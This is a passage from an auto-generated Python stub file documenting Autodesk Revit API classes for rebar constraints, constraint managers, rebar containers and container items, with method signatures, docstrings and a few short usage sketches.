""" pass def GetHandleType(self): """ GetHandleType(self: RebarConstrainedHandle) -> RebarHandleType Returns the RebarHandleType of a RebarConstrainedHandle. Returns: The RebarHandleType of the specified RebarConstrainedHandle. """ pass def IsEdgeHandle(self): """ IsEdgeHandle(self: RebarConstrainedHandle) -> bool Returns true if the RebarHandleType of the RebarConstrainedHandle is 'Edge.' """ pass def IsValid(self): """ IsValid(self: RebarConstrainedHandle) -> bool Checks that the RebarConstrainedHandle still has access to valid Rebar handle data and that its RebarConstraintsManager is still valid. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarConstrainedHandle, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarConstrainedHandle) -> bool """ class RebarConstraint(object, IDisposable): """ A class representing a constraint on a handle of a rebar element. """ def Dispose(self): """ Dispose(self: RebarConstraint) """ pass def GetConstraintType(self): """ GetConstraintType(self: RebarConstraint) -> RebarConstraintType Returns the RebarConstraintType of a RebarConstraint. Returns: The RebarConstraintType of the specified RebarConstraint. """ pass def GetDistanceToTargetCover(self): """ GetDistanceToTargetCover(self: RebarConstraint) -> float Returns the distance from the RebarConstrainedHandle to the target Host Cover Element surface. The RebarConstraintType of the RebarConstraint must be 'ToCover.' """ pass def GetDistanceToTargetHostFace(self): """ GetDistanceToTargetHostFace(self: RebarConstraint) -> float Returns the distance from the RebarConstrainedHandle to the target Host Element surface. The RebarConstraintType of the RebarConstraint must be 'FixedDistanceToHostFace.' """ pass def GetRebarConstraintTargetHostFaceType(self): """ GetRebarConstraintTargetHostFaceType(self: RebarConstraint) -> RebarConstraintTargetHostFaceType Returns the RebarConstraintTargetHostFaceType of the host Element face to which the RebarConstraint is attached. The RebarConstraintType of the RebarConstraint must be 'FixedDistanceToHostFace' or 'ToCover.' """ pass def GetTargetElement(self): """ GetTargetElement(self: RebarConstraint) -> Element Returns the Element object (either Host or Rebar) which provides the constraint. """ pass def GetTargetHostFaceReference(self): """ GetTargetHostFaceReference(self: RebarConstraint) -> Reference Returns a reference to the host Element face to which the RebarConstraint is attached. The RebarConstraintType of the RebarConstraint must be 'FixedDistanceToHostFace' or 'ToCover.' Returns: Requested reference. 
""" pass def GetTargetRebarAngleOnBarOrHookBend(self): """ GetTargetRebarAngleOnBarOrHookBend(self: RebarConstraint) -> int Returns the angular increment along a bar or hook bend to which the RebarConstraint is attached. Returns: The angular increment relative to the reference bar edge. """ pass def GetTargetRebarBendNumber(self): """ GetTargetRebarBendNumber(self: RebarConstraint) -> int Returns the number of the bend on the other Rebar Element to which this RebarConstraint is attached. The RebarConstraint must be of RebarConstraintType 'ToOtherRebar,' and the TargetRebarConstraintType must be 'BarBend.' """ pass def GetTargetRebarConstraintType(self): """ GetTargetRebarConstraintType(self: RebarConstraint) -> TargetRebarConstraintType Returns the TargetRebarConstraintType of the handle on the other Rebar Element to which this RebarConstraint is attached. The RebarConstraintType of the RebarConstraint must be 'ToOtherRebar.' """ pass def GetTargetRebarEdgeNumber(self): """ GetTargetRebarEdgeNumber(self: RebarConstraint) -> int Returns the number of the edge on the other Rebar Element to which this RebarConstraint is attached. The RebarConstraint must be of RebarConstraintType 'ToOtherRebar,' and the TargetRebarConstraintType must be 'Edge.' """ pass def GetTargetRebarHookBarEnd(self): """ GetTargetRebarHookBarEnd(self: RebarConstraint) -> int Returns 0 or 1 to indicate which end hook on the other Rebar Element to which this RebarConstraint is attached. The RebarConstraint must be of RebarConstraintType 'ToOtherRebar,' and the TargetRebarConstraintType must be 'HookBend.' """ pass def HasAnEdgeNumber(self): """ HasAnEdgeNumber(self: RebarConstraint) -> bool Checks if the getTargetRebarEdgeNumber method can be called for the RebarConstraint. """ pass def IsEqual(self, other): """ IsEqual(self: RebarConstraint, other: RebarConstraint) -> bool Returns true if the specified RebarConstraint is the same as 'this.' The method can be used to determine which of the RebarConstraint candidates offered by the RebarConstraintsManager is currently active. """ pass def IsFixedDistanceToHostFace(self): """ IsFixedDistanceToHostFace(self: RebarConstraint) -> bool Returns true if the RebarConstraintType of the RebarConstraint is 'FixedDistanceToHostFace.' """ pass def IsToCover(self): """ IsToCover(self: RebarConstraint) -> bool Returns true if the RebarConstraintType of the RebarConstraint is 'ToCover.' """ pass def IsToHostFaceOrCover(self): """ IsToHostFaceOrCover(self: RebarConstraint) -> bool Returns true if the RebarConstraintType of the RebarConstraint is either 'FixedDistanceToHostFace' or 'ToCover.' """ pass def IsToOtherRebar(self): """ IsToOtherRebar(self: RebarConstraint) -> bool Returns true if the RebarConstraintType of the RebarConstraint is 'ToOtherRebar.' """ pass def IsValid(self): """ IsValid(self: RebarConstraint) -> bool Checks that the RebarConstraint still has access to valid Rebar constraint data and that its RebarConstraintsManager is still valid. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarConstraint, disposing: bool) """ pass def SetDistanceToTargetCover(self, distanceToTargetCover): """ SetDistanceToTargetCover(self: RebarConstraint, distanceToTargetCover: float) Sets the distance from the RebarConstrainedHandle to the target Host Cover Element surface. The RebarConstraintType of the RebarConstraint must be 'ToCover.' 
distanceToTargetCover: The distance is given as an offset value, the sign of which depends on Host Cover direction. """ pass def SetDistanceToTargetHostFace(self, offset): """ SetDistanceToTargetHostFace(self: RebarConstraint, offset: float) Sets the distance from the RebarConstrainedHandle to the target Host Element surface. The RebarConstraintType of the RebarConstraint must be 'FixedDistanceToHostFace.' offset: The distance is given as an offset value, the sign of which depends on Host Face direction. """ pass def TargetIsBarBend(self): """ TargetIsBarBend(self: RebarConstraint) -> bool Returns true if the RebarTargetConstraintType of the RebarConstraint is 'BarBend' """ pass def TargetIsHookBend(self): """ TargetIsHookBend(self: RebarConstraint) -> bool Returns true if the RebarTargetConstraintType of the RebarConstraint is 'HookBend' """ pass def TargetRebarConstraintTypeIsEdge(self): """ TargetRebarConstraintTypeIsEdge(self: RebarConstraint) -> bool Returns true if the RebarConstraintType of the RebarConstraint is 'ToOtherRebar,' and the RebarConstraint is attached to an edge of the other Rebar Element. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarConstraint) -> bool """ class RebarConstraintsManager(object, IDisposable): """ A class used to obtain information about the constraints (RebarConstraints) acting on the shape handles (RebarConstrainedHandles) of a Rebar element, and to replace default constraints with user-preferred choices. """ def ClearHandleConstraintPairHighlighting(self, aDoc): """ ClearHandleConstraintPairHighlighting(self: RebarConstraintsManager, aDoc: Document) Clears all highlighting in all views. """ pass def Dispose(self): """ Dispose(self: RebarConstraintsManager) """ pass def GetAllConstrainedHandles(self): """ GetAllConstrainedHandles(self: RebarConstraintsManager) -> IList[RebarConstrainedHandle] Retrieves all handles on the Rebar that are constrained to external references. Returns: A collection of RebarConstrainedHandles """ pass def GetConstraintCandidatesForHandle(self, handle): """ GetConstraintCandidatesForHandle(self: RebarConstraintsManager, handle: RebarConstrainedHandle) -> IList[RebarConstraint] Returns all possible RebarConstraints that could be used for a specified RebarConstrainedHandle. handle: The RebarConstrainedHandle for which constraint candidates are sought. Returns: A collection of RebarConstraints """ pass def GetCurrentConstraintOnHandle(self, handle): """ GetCurrentConstraintOnHandle(self: RebarConstraintsManager, handle: RebarConstrainedHandle) -> RebarConstraint Retrieves the RebarConstraint that acts on the specified RebarConstraintHandle. 
""" pass def GetPreferredConstraintOnHandle(self, handle): """ GetPreferredConstraintOnHandle(self: RebarConstraintsManager, handle: RebarConstrainedHandle) -> RebarConstraint Returns the RebarConstraint that has been set as preferred for the specified RebarConstrainedHandle. handle: The RebarConstrainedHandle for which the user RebarConstraint is to be returned. Returns: The user prefered RebarConstraint applied to the RebarConstrainedHandle. """ pass def HasValidRebar(self): """ HasValidRebar(self: RebarConstraintsManager) -> bool Checks whether the Manager's Rebar is still valid. """ pass def HighlightHandleConstraintPairInAllViews(self, aDoc, handle, constraint): """ HighlightHandleConstraintPairInAllViews(self: RebarConstraintsManager, aDoc: Document, handle: RebarConstrainedHandle, constraint: RebarConstraint) Highlights the specified RebarConstrainedHandle and RebarConstraint in all views. handle: The RebarConstrainedHandle to be highlighted in all views. constraint: The RebarConstraint to be highlighted in all views. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarConstraintsManager, disposing: bool) """ pass def RemovePreferredConstraintFromHandle(self, handle): """ RemovePreferredConstraintFromHandle(self: RebarConstraintsManager, handle: RebarConstrainedHandle) Clears the user-preferred RebarConstraint from the specified RebarConstrainedHandle. handle: The RebarConstrainedHandle for which the user RebarConstraint is to be deleted. """ pass def SetPreferredConstraintForHandle(self, handle, constraint): """ SetPreferredConstraintForHandle(self: RebarConstraintsManager, handle: RebarConstrainedHandle, constraint: RebarConstraint) Sets the RebarConstraint as preferred constraint target for the specified RebarConstrainedHandle. handle: The RebarConstrainedHandle to which the new RebarConstraint is to be applied. constraint: The new RebarConstraint to be applied to the RebarConstrainedHandle. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarConstraintsManager) -> bool """ IsRebarConstrainedPlacementEnabled = False class RebarConstraintTargetHostFaceType(Enum, IComparable, IFormattable, IConvertible): """ A type to help identify the individual face on a host element to which a Rebar handle is constrained. 
enum RebarConstraintTargetHostFaceType, values: Bottom (2), End0 (3), End1 (4), FaceWithTagId (0), Side0 (5), Side1 (6), Top (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Bottom = None End0 = None End1 = None FaceWithTagId = None Side0 = None Side1 = None Top = None value__ = None class RebarConstraintType(Enum, IComparable, IFormattable, IConvertible): """ The various types of constraints that can be applied to a RebarConstrainedHandle. enum RebarConstraintType, values: FixedDistanceToHostFace (0), ToCover (1), ToOtherRebar (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass FixedDistanceToHostFace = None ToCover = None ToOtherRebar = None value__ = None class RebarContainer(Element, IDisposable, IEnumerable[RebarContainerItem], IEnumerable): """ An object that represents an Rebar Container Element within the Autodesk Revit project. 
""" def AppendItemFromCurves(self, style, barType, startHook, endHook, normal, curves, startHookOrient, endHookOrient, useExistingShapeIfPossible, createNewShape): """ AppendItemFromCurves(self: RebarContainer, style: RebarStyle, barType: RebarBarType, startHook: RebarHookType, endHook: RebarHookType, normal: XYZ, curves: IList[Curve], startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation, useExistingShapeIfPossible: bool, createNewShape: bool) -> RebarContainerItem """ pass def AppendItemFromCurvesAndShape(self, rebarShape, barType, startHook, endHook, normal, curves, startHookOrient, endHookOrient): """ AppendItemFromCurvesAndShape(self: RebarContainer, rebarShape: RebarShape, barType: RebarBarType, startHook: RebarHookType, endHook: RebarHookType, normal: XYZ, curves: IList[Curve], startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation) -> RebarContainerItem """ pass def AppendItemFromRebar(self, rebar): """ AppendItemFromRebar(self: RebarContainer, rebar: Rebar) -> RebarContainerItem Appends an Item to the RebarContainer. Fills its data on base of the Rebar. rebar: The Rebar. Returns: The Rebar Container Item. """ pass def AppendItemFromRebarShape(self, rebarShape, barType, origin, xVector, yVector): """ AppendItemFromRebarShape(self: RebarContainer, rebarShape: RebarShape, barType: RebarBarType, origin: XYZ, xVector: XYZ, yVector: XYZ) -> RebarContainerItem Appends an Item to the RebarContainer. Fills its data on base of the Rebar. rebarShape: A RebarShape element that defines the shape of the rebar. barType: A RebarBarType element that defines bar diameter, bend radius and material of the rebar. origin: The lower-left corner of the shape's bounding box will be placed at this point in the project. xVector: The x-axis in the shape definition will be mapped to this direction in the project. yVector: The y-axis in the shape definition will be mapped to this direction in the project. Returns: The Rebar Container Item. """ pass def CanApplyPresentationMode(self, dBView): """ CanApplyPresentationMode(self: RebarContainer, dBView: View) -> bool Checks if a presentation mode can be applied for this RebarContainer in the given view. dBView: The view in which presentation mode will be applied. Returns: True if presentation mode can be applied for this view, false otherwise. """ pass def ClearItems(self): """ ClearItems(self: RebarContainer) Clears all the Items stored in this Rebar Container element. """ pass def Contains(self, pItem): """ Contains(self: RebarContainer, pItem: RebarContainerItem) -> bool Checks if the RebarContainer has this item as one of its members. pItem: The item to be checked if RebarContainer has it as one of its members Returns: True if RebarContainer has this item as one of its members, false otherwise. """ pass @staticmethod def Create(aDoc, hostElement, rebarContainerTypeId): """ Create(aDoc: Document, hostElement: Element, rebarContainerTypeId: ElementId) -> RebarContainer Creates a new instance of a Rebar Container element within the project. aDoc: A document. hostElement: The element that will host the RebarContainer. rebarContainerTypeId: The id of the RebarContainerType. Returns: The newly created Rebar Container instance. 
""" pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetEnumerator(self): """ GetEnumerator(self: RebarContainer) -> IEnumerator[RebarContainerItem] Returns an enumerator that iterates through a collection. Returns: An IEnumerator object that can be used to iterate through the collection. """ pass def GetHostId(self): """ GetHostId(self: RebarContainer) -> ElementId The element that contains the rebar. Returns: The element that the rebar object belongs to, such as a structural wall, floor, foundation, beam, brace or column. """ pass def GetItem(self, itemIndex): """ GetItem(self: RebarContainer, itemIndex: int) -> RebarContainerItem Gets the item stored in the RebarContainer at the associated index. itemIndex: Item index in the Rebar Container Returns: Rebar Container Item """ pass def GetParametersManager(self): """ GetParametersManager(self: RebarContainer) -> RebarContainerParameterManager Returns an object used to manage parameters of the Rebar Container. Returns: The parameters manager. """ pass def GetRebarContainerIterator(self): """ GetRebarContainerIterator(self: RebarContainer) -> RebarContainerIterator Returns a Rebar Container Iterator that iterates through the Rebar Container Items. Returns: A Rebar Container Iterator object that can be used to iterate through Rebar Container Items in the collection. """ pass def GetReinforcementRoundingManager(self): """ GetReinforcementRoundingManager(self: RebarContainer) -> RebarRoundingManager Returns an object for managing reinforcement rounding override settings. Returns: The rounding manager. """ pass def HasPresentationOverrides(self, dBView): """ HasPresentationOverrides(self: RebarContainer, dBView: View) -> bool Identifies if any RebarContainerItem of this RebarContainer has overridden default presentation settings for the given view. dBView: The view. Returns: True if if any RebarContainerItem of this RebarContainer has overridden default presentation settings, false otherwise. """ pass def IsItemHidden(self, view, itemIndex): """ IsItemHidden(self: RebarContainer, view: View, itemIndex: int) -> bool Identifies if a given RebarContainerItem is hidden in this view. view: The view. itemIndex: Item index in the Rebar Container. Returns: True if the RebarContainerItem is hidden in this view, false otherwise. """ pass def IsSolidInView(self, view): """ IsSolidInView(self: RebarContainer, view: View3D) -> bool Checks if this RebarContainer element is shown as solid in the given 3D view. view: The 3D view element Returns: True this RebarContainer element is shown as solid in the given 3D view, false otherwise. """ pass def IsUnobscuredInView(self, view): """ IsUnobscuredInView(self: RebarContainer, view: View) -> bool Checks if this rebar container element is shown unobscured in a view. view: The view element Returns: True if rebar is shown unobscured, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def RemoveItem(self, pItem): """ RemoveItem(self: RebarContainer, pItem: RebarContainerItem) Removes Item from the Rebar Container. 
pItem: Item to be removed from this Rebar Container """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetHostId(self, doc, hostId): """ SetHostId(self: RebarContainer, doc: Document, hostId: ElementId) The element that contains the rebar. doc: The document containing both this element and the host element. hostId: The element that the rebar object belongs to, such as a structural wall, floor, foundation, beam, brace or column. The rebar does not need to be strictly inside the host, but it must be assigned to one host element. """ pass def SetItemHiddenStatus(self, view, itemIndex, hide): """ SetItemHiddenStatus(self: RebarContainer, view: View, itemIndex: int, hide: bool) Sets the RebarContainerItem to be hidden or unhidden in the given view. view: The view. itemIndex: Item index in the Rebar Container. hide: True to hide this RebarContainerItem in the view, false to unhide the item. """ pass def SetSolidInView(self, view, solid): """ SetSolidInView(self: RebarContainer, view: View3D, solid: bool) Sets this RebarContainer element is shown as solid in the given 3D view. view: The 3D view element solid: True if this RebarContainer element is shown as solid in the given 3D view, false otherwise. """ pass def SetUnobscuredInView(self, view, unobscured): """ SetUnobscuredInView(self: RebarContainer, view: View, unobscured: bool) Sets this rebar container element to be shown unobscured in a view. view: The view element unobscured: True if rebar is shown unobscured, false otherwise. """ pass def __contains__(self, *args): #cannot find CLR method """ __contains__[RebarContainerItem](enumerable: IEnumerable[RebarContainerItem], value: RebarContainerItem) -> bool """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __getitem__(self, *args): #cannot find CLR method """ x.__getitem__(y) <==> x[y] """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __iter__(self, *args): #cannot find CLR method """ __iter__(self: IEnumerable) -> object """ pass ItemsCount = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The count of Items in this Rebar Container. Get: ItemsCount(self: RebarContainer) -> int """ PresentItemsAsSubelements = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Identifies if Items should be presented in schedules and tags as separate subelements. Get: PresentItemsAsSubelements(self: RebarContainer) -> bool Set: PresentItemsAsSubelements(self: RebarContainer) = value """ ScheduleMark = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The Schedule Mark parameter. On creation, the Schedule Mark is set to a value that is unique to the host, but it can be set to any value. Get: ScheduleMark(self: RebarContainer) -> str Set: ScheduleMark(self: RebarContainer) = value """ class RebarContainerItem(object, IDisposable): """ Provides implementation for Rebar stored in RebarContainer. 
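# --- Usage sketch (not part of the generated stubs) ----------------------
# Adjusts how a RebarContainer is displayed. 'container', 'view3d' and 'view'
# are placeholders for an existing RebarContainer, a View3D and a View; an
# open Transaction is assumed.
if not container.IsSolidInView(view3d):
    container.SetSolidInView(view3d, True)      # show bars as solids in the 3D view
container.SetUnobscuredInView(view, True)       # draw bars unobscured in the view
container.SetItemHiddenStatus(view, 0, False)   # ensure the first item is visible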
""" def CanApplyPresentationMode(self, dBView): """ CanApplyPresentationMode(self: RebarContainerItem, dBView: View) -> bool Checks if a presentation mode can be applied for this rebar in the given view. dBView: The view in which presentation mode will be applied. Returns: True if presentation mode can be applied for this view, false otherwise. """ pass def CanUseHookType(self, proposedHookId): """ CanUseHookType(self: RebarContainerItem, proposedHookId: ElementId) -> bool Checks if the specified RebarHookType id is of a valid RebarHookType for the Rebar's RebarBarType proposedHookId: The Id of the RebarHookType Returns: Returns true if the id is of a valid RebarHookType for the Rebar element. """ pass def ClearPresentationMode(self, dBView): """ ClearPresentationMode(self: RebarContainerItem, dBView: View) Sets the presentation mode for this rebar set to the default (either for a single view, or for all views). dBView: The view where the presentation mode will be cleared. NULL for all views """ pass def ComputeDrivingCurves(self): """ ComputeDrivingCurves(self: RebarContainerItem) -> IList[Curve] Compute the driving curves. Returns: Returns an empty array if an error is encountered. """ pass def Dispose(self): """ Dispose(self: RebarContainerItem) """ pass def DoesBarExistAtPosition(self, barPosition): """ DoesBarExistAtPosition(self: RebarContainerItem, barPosition: int) -> bool Checks whether a bar exists at the specified position. barPosition: A bar position index between 0 and NumberOfBarPositions-1. """ pass def FindMatchingPredefinedPresentationMode(self, dBView): """ FindMatchingPredefinedPresentationMode(self: RebarContainerItem, dBView: View) -> RebarPresentationMode Determines if there is a matching RebarPresentationMode for the current set of selected hidden and unhidden bars assigned to the given view. dBView: The view. Returns: The presentation mode that matches the current set of selected hidden and unhidden bars. If there is no better match, this returns RebarPresentationMode.Select. """ pass def GetBarPositionTransform(self, barPositionIndex): """ GetBarPositionTransform(self: RebarContainerItem, barPositionIndex: int) -> Transform Return a transform representing the relative position of any individual bar in the set. barPositionIndex: An index between 0 and (NumberOfBarPositions-1). Returns: The position of a bar in the set relative to the first position. """ pass def GetBendData(self): """ GetBendData(self: RebarContainerItem) -> RebarBendData Gets the RebarBendData, containing bar and hook information, of the instance. """ pass def GetCenterlineCurves(self, adjustForSelfIntersection, suppressHooks, suppressBendRadius, multiplanarOption=None): """ GetCenterlineCurves(self: RebarContainerItem, adjustForSelfIntersection: bool, suppressHooks: bool, suppressBendRadius: bool) -> IList[Curve] A chain of curves representing the centerline of the rebar. adjustForSelfIntersection: If the curves overlap, as in a planar stirrup, this parameter controls whether they should be adjusted to avoid intersection (as in fine views), or kept in a single plane for simplicity (as in coarse views). suppressHooks: Identifies if the chain will include hooks curves. suppressBendRadius: Identifies if the connected chain will include unfilleted curves. Returns: The centerline curves or empty array if the curves cannot be computed because the parameters values are inconsistent with the constraints of the RebarShape definition. 
GetCenterlineCurves(self: RebarContainerItem, adjustForSelfIntersection: bool, suppressHooks: bool, suppressBendRadius: bool, multiplanarOption: MultiplanarOption) -> IList[Curve] A chain of curves representing the centerline of the rebar. adjustForSelfIntersection: If the curves overlap, as in a planar stirrup, this parameter controls whether they should be adjusted to avoid intersection (as in fine views), or kept in a single plane for simplicity (as in coarse views). suppressHooks: Identifies if the chain will include hooks curves. suppressBendRadius: Identifies if the connected chain will include unfilleted curves. multiplanarOption: If the Rebar is a multi-planar shape, this parameter controls whether to generate only the curves in the primary plane (IncludeOnlyPlanarCurves), or to generate all curves, (IncludeAllMultiplanarCurves) including the out-of-plane connector segments as well as multi-planar copies of the primary plane curves. This argument is ignored for planar shapes. Returns: The centerline curves or empty array if the curves cannot be computed because the parameters values are inconsistent with the constraints of the RebarShape definition. """ pass def GetDistributionPath(self): """ GetDistributionPath(self: RebarContainerItem) -> Line The distribution path of a rebar set. Returns: A line beginning at (0, 0, 0) and representing the direction and length of the set. """ pass def GetHookOrientation(self, iEnd): """ GetHookOrientation(self: RebarContainerItem, iEnd: int) -> RebarHookOrientation Returns the orientation of the hook plane at the start or at the end of the rebar with respect to the orientation of the first or the last curve and the plane normal. iEnd: 0 for the start hook, 1 for the end hook. Returns: Value = Right: The hook is on your right as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." Value = Left: The hook is on your left as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." """ pass def GetHookTypeId(self, end): """ GetHookTypeId(self: RebarContainerItem, end: int) -> ElementId Get the id of the RebarHookType to be applied to the rebar. end: 0 for the start hook, 1 for the end hook. Returns: The id of a RebarHookType, or invalidElementId if the rebar has no hook at the specified end. """ pass def GetPresentationMode(self, dBView): """ GetPresentationMode(self: RebarContainerItem, dBView: View) -> RebarPresentationMode Gets the presentaion mode for this rebar set when displayed in the given view. dBView: The view. Returns: The presentation mode. """ pass def HasPresentationOverrides(self, dBView): """ HasPresentationOverrides(self: RebarContainerItem, dBView: View) -> bool Identifies if this rebar set has overridden default presentation settings for the given view. dBView: The view. Returns: True if this rebar set has overriden default presentation settings, false otherwise. """ pass def IsBarHidden(self, view, barIndex): """ IsBarHidden(self: RebarContainerItem, view: View, barIndex: int) -> bool Identifies if a given bar in this rebar set is hidden in this view. view: The view. barIndex: The index of the bar from this rebar set. Returns: True if the bar is hidden in this view, false otherwise. """ pass def IsRebarInSection(self, dBView): """ IsRebarInSection(self: RebarContainerItem, dBView: View) -> bool Identifies if this rebar set is shown as a cross-section in the given view. dBView: The view. 
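# --- Usage sketch (not part of the generated stubs) ----------------------
# Reads the centerline geometry of a RebarContainerItem and sums its length.
# 'item' is a placeholder for an existing RebarContainerItem; Curve.Length is
# a standard Revit API property assumed here, and lengths are in Revit's
# internal units (decimal feet).
curves = item.GetCenterlineCurves(False, False, False)
if curves.Count == 0:
    print("curves could not be computed for this shape")
else:
    total = sum(c.Length for c in curves)
    print("%d centerline curve(s), total length %f" % (curves.Count, total))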
Returns: True if this rebar set is shown as a cross-section, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarContainerItem, disposing: bool) """ pass def SetBarHiddenStatus(self, view, barIndex, hide): """ SetBarHiddenStatus(self: RebarContainerItem, view: View, barIndex: int, hide: bool) Sets the bar in this rebar set to be hidden or unhidden in the given view. view: The view. barIndex: The index of the bar from this set. hide: True to hide this bar in the view, false to unhide the bar. """ pass def SetFromCurves(self, style, barType, startHook, endHook, norm, curves, startHookOrient, endHookOrient, useExistingShapeIfPossible, createNewShape): """ SetFromCurves(self: RebarContainerItem, style: RebarStyle, barType: RebarBarType, startHook: RebarHookType, endHook: RebarHookType, norm: XYZ, curves: IList[Curve], startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation, useExistingShapeIfPossible: bool, createNewShape: bool) """ pass def SetFromCurvesAndShape(self, rebarShape, barType, startHook, endHook, norm, curves, startHookOrient, endHookOrient): """ SetFromCurvesAndShape(self: RebarContainerItem, rebarShape: RebarShape, barType: RebarBarType, startHook: RebarHookType, endHook: RebarHookType, norm: XYZ, curves: IList[Curve], startHookOrient: RebarHookOrientation, endHookOrient: RebarHookOrientation) """ pass def SetFromRebar(self, rebar): """ SetFromRebar(self: RebarContainerItem, rebar: Rebar) Set an instance of a RebarContainerItem element according to a Rebar parameters. rebar: The Rebar. """ pass def SetFromRebarShape(self, rebarShape, barType, origin, xVec, yVec): """ SetFromRebarShape(self: RebarContainerItem, rebarShape: RebarShape, barType: RebarBarType, origin: XYZ, xVec: XYZ, yVec: XYZ) Set an instance of a RebarContainerItem element, as an instance of a RebarShape. The instance will have the default shape parameters from the RebarShape, and its location is based on the bounding box of the shape in the shape definition. Hooks are removed from the shape before computing its bounding box. If appropriate hooks can be found in the document, they will be assigned arbitrarily. rebarShape: A RebarShape element that defines the shape of the rebar. barType: A RebarBarType element that defines bar diameter, bend radius and material of the rebar. origin: The lower-left corner of the shape's bounding box will be placed at this point in the project. xVec: The x-axis in the shape definition will be mapped to this direction in the project. yVec: The y-axis in the shape definition will be mapped to this direction in the project. """ pass def SetHookOrientation(self, iEnd, hookOrientation): """ SetHookOrientation(self: RebarContainerItem, iEnd: int, hookOrientation: RebarHookOrientation) Defines the orientation of the hook plane at the start or at the end of the rebar with respect to the orientation of the first or the last curve and the plane normal. iEnd: 0 for the start hook, 1 for the end hook. hookOrientation: Only two values are permitted: Value = Right: The hook is on your right as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." Value = Left: The hook is on your left as you stand at the end of the bar, with the bar behind you, taking the bar's normal as "up." 
